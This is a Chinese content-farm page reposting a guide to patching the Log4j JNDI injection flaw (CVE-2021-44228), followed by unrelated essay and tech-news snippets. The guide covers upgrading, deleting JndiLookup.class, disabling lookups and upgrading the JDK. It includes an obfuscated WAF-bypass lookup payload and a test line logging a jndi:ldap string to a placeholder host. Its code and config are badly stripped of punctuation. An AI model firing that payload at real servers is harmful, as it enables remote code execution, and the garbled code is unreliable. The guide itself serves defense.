保健励志美文体育育儿作文
投稿投诉
作文动态
热点娱乐
育儿情感
教程科技
体育养生
教案探索
美文旅游
财经日志
励志范文
论文时尚
保健游戏
护肤业界

Log4j严重漏洞修最新复方案参考

  CVE202144228,原理上是log4jcore代码中的JNDI注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于日志场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j作为Java开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commonscollections反序列化漏洞的影响范围。
  Github漏洞公告:https:github。comadvisoriesGHSAjfh8c2jp5v3q
  影响2。15。0的所有2。x版本。也就是说,除了最新版本之外的所有版本都受影响。
  最直接、有效、稳定的修复方式是:将log4jcore升级到2。15。0版本
  最直接、有效、稳定的修复方式是:将log4jcore升级到2。15。0版本
  最直接、有效、稳定的修复方式是:将log4jcore升级到2。15。0版本
  如果实在无法升级,可以尝试把漏洞类删掉。其他修复方式可以结合使用起到比较好的快速缓解作用,但受限于不同的环境,可能会产生各种各样比较麻烦的问题或者未来的隐患。长期修复方案需要保证稳定、可靠、持久有效,这种严重漏洞值得一个发布和重启。
  2。15。0版本下载地址:https:repo。maven。apache。orgmaven2orgapachelogginglog4jlog4jcore2。15。0
  pom。xml配置dependencygroupIdorg。apache。logging。log4jgroupIdlog4jcoreartifactIdversion2。15。0versiondependency缓解方式1:接入安全产品
  第一时间上WAF规则、RASP拦截等措施,给修复争取时间。
  但是也要注意一些静态规则上的绕过,log4j支持的写法比较多,有非常多绕过姿势。比如:{{lower:j}{upper:n}{lower:d}{upper:i}:{lower:r}m{lower:i}}:xxxxxxx。xxpoc}缓解方式2:删除漏洞类
  通过删除漏洞类进行修复的方案比较稳,也是官方推荐的一种修复方案。直接删除log4jjar包中存在漏洞的类:zipqdlog4jcore。jarorgapachelogginglog4jcorelookupJndiLookup。class
  这种修复比较方便快捷,一般业务代码也不会用到jndilookup这个功能。不过可能会对基于版本号判定的安全数据采集造成一定困扰,无法准确统计漏洞的最新受影响情况。建议删除之后在jar包后面加上一定的标记,如:log4j2。14。1。sec。jar
  另外,由于某些原因不想删除的话,可以自己代码替换原始的JndiLookup类,将它加到业务代码中。需要注意的是,必须保证它在log4j原类之前加载。packageorg。apache。logging。log4j。core。lookup;publicclassJndiLookup{publicJndiLookup(){thrownewNoClassDefFoundError(JNDIlookupisdisabled);}}
  也可以做成依赖包,在log4jcore之前添加,可以实现同样的效果(注意不要引入不可信的第三方依赖,可能导致潜在安全风险,以下配置来源互联网,仅作为示例,请勿直接使用):dependencygroupIdorg。glavogroupIdlog4jpatchartifactIdversion1。0versiondependency
  当然也可以通过RASP的方式干掉漏洞类,Github上有不少RASP的无损修复方案,比如:
  https:github。comchaitinlog4j2vaccine
  https:github。comboundaryxcloudrasplog4j2缓解方式3:通过配置禁用log4j的lookup功能
  禁用的方式就比较多了。然而下面2、3、4这几种方式对低于2。10版本的log4jcore都没有效果,而且环境变量和启动参数这种设置,在迁移或者变更的过程中丢失的可能性比较大。log4j在2。15。0版本中默认就已经关闭了lookup功能。
  log4j2。component。properties、log4j2。xml默认放在ClassPath路径下,如:源代码的资源目录或者可执行程序所在的当前目录。1。设置日志输出Pattern格式
  对于2。7的版本,在log4j中对每一个日志输出格式进行修改。在msg占位符后面添加{nolookups},这种方式的适用范围比其他三种配置更广。比如在log4j2。xml中配置:lt;?xmlversion1。0encodingUTF8?ConfigurationstatusWARNConsolenameConsoletargetSYSTEMOUTPatternLayoutpatternd{HH:mm:ss。SSS}〔t〕5levellogger{36}msg{nolookups}nConsoleAppendersLoggersRootlevelerrorRootLoggersConfigurationpublicclassTest{publicstaticvoidmain(String〔〕args){Stringt{jndi:ldap:xxx。comxxx};LoggerloggerLogManager。getLogger(LogManager。ROOTLOGGERNAME);logger。error(t);}}2。设置JVM系统属性
  在Java应用启动参数中增加Dlog4j2。formatMsgNoLookupstrue,或者在业务代码中设置系统属性:必须在log4j实例化之前设置该系统属性System。setProperty(log4j2。formatMsgNoLookups,true);LoggerloggerLogManager。getLogger(LogManager。ROOTLOGGERNAME);3。修改配置文件
  在配置文件log4j2。component。properties中增加:log4j2。formatMsgNoLookupstrue,配置文件放置于应用程序的ClassPath路径下。4。设置进程环境变量
  在环境变量中增加:LOG4JFORMATMSGNOLOOKUPStrue注意!这些配置和属性,并不能在所有场景下生效,比如在logstash中就无法生效:SolutionsandMitigations:ThewidespreadflagDlog4j2。formatMsgNoLookupstruedoesNOTmitigatethevulnerabilityinLogstash,asLogstashusesLog4jinawaywheretheflaghasnoeffect。ItisthereforenecessarytoremovetheJndiLookupclassfromthelog4j2corejar,withthefollowingcommand:
  zipqdlogstashcorelibjarslog4jcore2。orgapachelogginglog4jcorelookupJndiLookup。class
  Refer:https:discuss。elastic。cotapachelog4j2remotecodeexecutionrcevulnerabilitycve202144228esa202131291476缓解方式4:升级JDK版本
  对于OracleJDK11。0。1、8u191、7u201、6u211或者更高版本的JDK来说,默认就已经禁用了RMIReference、LDAPReference的远程加载。对于RCE来说,可以起到很直接的缓解作用,可以作为增强型的加固方案。
  在高版本JDK环境下,JNDI注入也还是存在一定RCE风险,可以参考这篇文章:https:kingx。meRestrictionsandBypassofJNDIManipulationsRCE。html
  另外log4j漏洞本身除了RCE,还存在着巨大的攻击面,比如SSRF、敏感信息泄露等等,威胁非常大,不要企图仅仅通过升级JDK版本来修复漏洞,建议还是老老实实升级。
  原文链接:https:kingx。mePatchlog4j。html
  如果这篇文章对你有帮助麻烦点赞关注一下

市场旺季将至,行业格局松动,手机品牌如何突围?5G时代来临,人们的通讯生活慢慢开始从4G向5G转移。2021年的数据显示,三家基础电信企业的移动电话用户总数达16。19亿户,比上年末净增2521万户。其中,5G手机终端连接……20万级别带有双激光雷达的唯一选择小鹏P5导购分析在前两天(7月17日),期待已久的小鹏P5终于公布了预售价格,小鹏P5共发布六款车型,预售价在1623万元之间。对于这样一款智能化程度如此之高的产品,在看完预售价格后很多朋友会……MiniLED商用元年,为什么是中国屏幕崛起的好机会?MiniLED?还是OLED?对于电视大屏设备的屏幕选择来说,这曾经是个非常纠结的问题但现在来看,问题的答案越来越明晰。尤其是在2021年被认为是MiniLED屏幕商用元……中美间做选择,欧洲通讯巨头离不开中国企业,果断退出美国5G联早在两年前,美国为了封锁华为等中国科技企业在国外市场的势力扩大,特意成立了一个名为OpenRAN的5G联盟,意图联合众多通讯行业的公司一起开源对接,来打破华为等通讯巨头对通讯设……如美国新太空武器可破坏卫星发射,中国会重新考虑美加入空间站么卫星太空发射,指的是卫星从装到载具上做好准备到进入到预定轨道的全过程,如果在这一过程中进行破坏,那就可以说具备了破坏卫星发射的能力。那美国具备了这一能力吗?当然具备了。不……鸿蒙系统微信分身怎么弄华为手机怎么开两个微信教程微信分身对于很多小伙伴来说还是很有必要的,特别是对于有销售性质的来说,工作微信和生活微信是分开的,所以微信分身很重要,那大家知道华为手机的鸿蒙系统怎么微信分身?下面分享设置同时……学武术范文范文一勤奋是在做每一件事是最必要的,只要是自己喜爱,就一定要也刻苦而勤奋,要尽自己的能耐去把她完成,俗话说:ldquo;宝剑锋从磨砺出,梅花香自苦寒来。rdquo;武术也……数字人民币联手美团B站,将迈向普及化关于数字移动支付市场,一直是微信支付与支付宝双分天下的状态,国家大力推出的数字人民币一直处在不温不火的状态,并且需要及时的推广,数字人民币想要实现未来的推广以及普及化,需要积极……2021中国国际数字经济博览会近500家企业为数字经济画像在聚力提升展览质量,成果展示方面,本届博览会更加突出新、特、精和国际化元素,展览总面积5万平方米,设主题展馆、数字产业馆、数字生活馆、数字河北暨重点区域展馆、室外智能网联汽车体……难忘元宵优秀作文时逢元宵,我轻执你盈盈的玉手,步上栏头,只望夕阳拍遍芳亭。你轻倚在我的肩膀,闭目呢喃。望着满亭的碎金与斜掠的双燕,我心中便只是美满,只有安祥。黄昏裹着一层薄纱退去,月儿便……微软五款大神办公软件比收费的还好用微软的大神级办公软件,除了Office三件套之外,其实还有很多,大多数也都是遵循一样的发售原则,针对个人用户基础功能的使用,大都是免费的,对于一般的用户的需求,其实是足够的,而……妈妈来北京日记昨天晚上妈妈坐火车来北京出差,妈妈下了火车先去中国安科院办事,办完事就到舅爷爷家找我,我们好几天没有见面了。妈妈一进门我就紧紧地抱住妈妈,我深深地亲了妈妈一口,妈妈也亲了我一口……
教师节作文教师节的礼物教师节作文:教师节的礼物今天是九月十日教师节。放学了,我一出教室,就马上开始想:ldquo;教师节送老师什么礼物呢?rdquo;突然一阵芳香扑鼻而来。我顺着香气走,……我的生日学生作文600字导语:今天,是我最高兴的一天,因为今天是我的生日,我请了我的好朋友来我家庆祝我的生日。以下是小编为大家整理分享的我的生日学生作文600字,欢迎阅读参考。我的生日作文(一)……爱的感悟师恩似海我心感恩有人说:ldquo;师恩如山。rdquo;因为高山巍巍,使人崇敬。我还想说:ldquo;师恩似海。rdquo;因为大海深沉、一望无际。岁月匆匆,如白马过隙。从小学到初中。一眨眼……永不言弃的追梦少年励志作文1000字追逐梦想的人不管有没有成功,别人都没有资格嘲笑。很多人只看到别人的失败,却没有见到背后的努力与辛酸,也许不曾成功过,但至少坚持过,流泪过,用心追求过,下面是永不言弃的追梦少年励……给老妈打分小学作文400字从呱呱落地到成为一个充满活力的小男孩,老妈在我身上注入的心血可不少!现在,我要给老妈来一个真真切切的评价,看看老妈到底能拿多少分。评价一:对我的学习在我做家庭作业的……描写白天鹅的四年级作文400字长长的脖子,扁扁的嘴,一身雪白的羽毛,整体像个船。(打一动物),不用说,一定就是天鹅了。天鹅长着长长的脖子,S型,就像船上的旗杆,胸脯挺挺的、圆圆的,就仿佛是破浪前进的船头;向……新型冠状肺炎小学作文范文导语:2020年的春节,我们在过年,他们却在过关,在这病毒肆虐的惴惴不安里,他们一路上披荆斩棘,无所畏惧。下面和小编一起来看新型冠状肺炎小学作文范文,希望有所帮助!新型冠状肺炎……读哈利波特有感500字期盼已久的寒假总算来了,我迫不及待地拿来哈利middot;波特系列小说的最后一部mdash;mdash;《哈利middot;波特与死亡圣器》如饥似渴地读了起来。我第一眼看到的就……可爱的小黑狗小学生四年级作文好长时间没有去外公家玩了。总盼望着,等待着机会上外公家玩一趟。机会终于来了。就在上个周末,外公给我们来电话说,桃子熟了,又忙这种田插秧,没时间卖。要我们全家去摘桃子吃,顺……秋思1品学网专稿未经允许不得转载秋思1河南宏力学校九一班陈阳秋天,是一个多雨的季节。秋天,是一个充满遐想的季节。题记秋,红叶飘然落下。一排排枫树立……花蝴蝶和小蜜蜂五年级作文在一个花的王国里,住着一只花蝴蝶和一只小蜜蜂。小蜜蜂整天勤勤恳恳地劳动,花蝴蝶却成天从早到晚地在外面玩耍。有一天爱美的花蝴蝶穿着漂亮的衣服在花丛中飞来飞去玩耍。在一朵花上……久违的动作心情日记在上世纪七十年代,我的内弟生病,在乡下久治不愈,我带着内弟去京城给他看病。看完病后,顺便去看望我的堂房大哥。大哥是一位久经沙场、在痛击日寇、蒋匪战争中多次立过战功的老八路……
友情链接:易事利快生活快传网聚热点七猫云快好知快百科中准网快好找文好找中准网快软网